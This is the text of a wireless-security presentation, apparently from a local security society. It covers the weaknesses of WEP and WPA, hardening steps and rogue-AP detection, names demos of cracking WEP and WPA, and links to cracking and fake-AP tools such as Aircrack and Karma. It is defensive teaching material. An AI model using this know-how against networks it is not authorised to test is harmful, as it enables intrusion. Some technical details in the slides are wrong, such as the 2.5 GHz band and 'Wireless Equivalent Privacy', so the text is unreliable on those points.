Professional Documents
Culture Documents
Suncoast Security Society
Wireless Types
Wireless Advantages / Disadvantages
Wireless Insecurities – WEP
Wireless Insecurities ‐ WPA
Hardening wireless
Detecting Rouge Wireless
Wireless Intrusion Detection
Demo cracking WEP
Demo cracking WPA
802.11a
5 Ghz
300 ft. range
54 mb transfer rate
802.11b
2.5 Ghz
300 ft. range
11 mb transfer rate
802.11g
2.5 Ghz
150 ft. range
54 mb transfer rate
802.11n
2.5 Ghz/ 5 Ghz
1200 ft. range
Theoretical 300 mb transfer rate ‐ burst
Convenience
Mobility
Productivity
Deployment
Expandability
Cost
Security
Range
Reliability
Speed
Wireless Equivalent Privacy
Part of the 802.11 standard to prevent eavesdropping and
data tampering
Uses an RC4 cipher stream and “x no. of bits” key with a 24 bit
random number known as the initialization vector (IV)
WEP Key Recovery
WEP uses the same WEP key and different IV
The IV is limited from (0 – 16,777,215)
Eventually reusing the IV
Unauthorized data decryption and Data Integrity
Once the key is known it can be used to gain access to
data or the AP itself
Poor key management
Once set they remain the same
In Corp. environment people leave and the keys should
be changed but rarely are
No access point authentication
Authentication works one way
Clients authenticate to the AP but
The access point has no way of authenticating the
client
Wifi Protected Access
Also known as 802.11i
Moved away from the RC4 cipher steam of WEP
to :
TKIP (Temporal Key Integrity Protocol ) /and or
AES (Advanced Encryption Standard)
Used 4 way hand shake to authenticate and
encrypt
Poor key management
Once set they remain the same
In Corp. environment people leave and the keys should
be changed but rarely are
No access point authentication
Authentication works one way
Clients authenticate to the AP but
The access point has no way of authenticating the
client
Don’t use wireless – if possible
User Layered Approach
MAC Address filter
Turn off SSID broadcast
Don’t allow AP to issue IP Addresses
Only allow access during certain times
Use WPA2 – Large no dictionary key – Home
Use WPA2 – With 802.1x port security aka (Radius)
Turn off auto connect to preferred networks on
clients (Karma)
Establish VPN connection from wireless APs to
your office
Use “fake AP” and produce 53,000 Aps
Apply protection to structure to prevent wireless
Setup wireless intrusion detection
Implement a wireless security policy
Provide for physical security
Provide a supported WLAN infrastructure
Implement 802.1x port‐based security on your
switches
Limit the number of MAC addresses per port to
only one
SW2(config‐if) # switchport port‐security maximum 1
Use a wireless client to detect the AP
You have to be within range of the AP
Can be difficult to detect if not broadcasting
Hard to manage remote sites
Tools
Airdefense – www.airdefense.net
Airmagnet – www.airmagnet.com
Netstumbler – www.netstumbler.com
Kismet – www.kismetwirless.net
Much more difficult –You have to rely a lot on the
footprint that is leaves instead of outright
detection.
Look for things like:
Multiple MAC addresses to one port
Larger than normal bandwidth usage on port
Analysis of packets will show anomalies
Unusual DHCP entries
Issues / Problems
Hard to discern what is directed at you
True detection occurs after the packets pass through
your AP
Infrastructure is loosely put together support
connectivity besides intrusion detection
Little to no support for this type of detection
Arpwatch – http://www‐nrg.ee.lbl.gov
Tools that do OS fingerprinting
Nmap – www.insecure.org
Xprobe – http://sys‐security.com/blog/xprobe2/
Nessus – www.nessus.org
http://www.intel.com/standards/case/case_802_11.htm
Unwanted Wireless Signals Bounce Off This Paint ‐
http://www.informationweek.com/news/mobility/showArticle.jhtml?articleID=198001494
WLAN Keygenerator ‐ http://darkvoice.dyndns.org/wlankeygen/
Wireless Security: Why WPA2 is better than WPA ‐
http://www.thegeekpub.com/Home/ArticleView/tabid/59/selectmoduleid/399/ArticleID/64/reftab/65/Default.aspx
WPA PSK Crackers: Loose Lips Sink Ships ‐ http://www.wi‐fiplanet.com/tutorials/article.php/3667586
SANS Reading Room – http://www.sans.org
Airdefense – www.airdefense.net
Airmagnet – www.airmagnet.com
Netstumbler – www.netstumbler.com
Kismet – www.kismetwirless.net
Arpwatch – http://www‐nrg.ee.lbl.gov
Tools that do OS fingerprinting
Nmap – www.insecure.org
Xprobe – http://sys‐security.com/blog/xprobe2/
Nessus – www.nessus.org
Air Crack ‐ http://www.aircrack‐ng.org/
Air Replay ‐ http://www.wirelessdefence.org/Contents/Aircrack_aireplay.htm
Airsnort ‐ http://airsnort.shmoo.com/
FakeAP ‐ http://www.blackalchemy.to/project/fakeap/
Hotspotter ‐ http://www.remote‐exploit.org/codes_hotspotter.html
Karma ‐ http://theta44.org/karma/index.html
MacChanger ‐ http://alobbs.com/macchanger/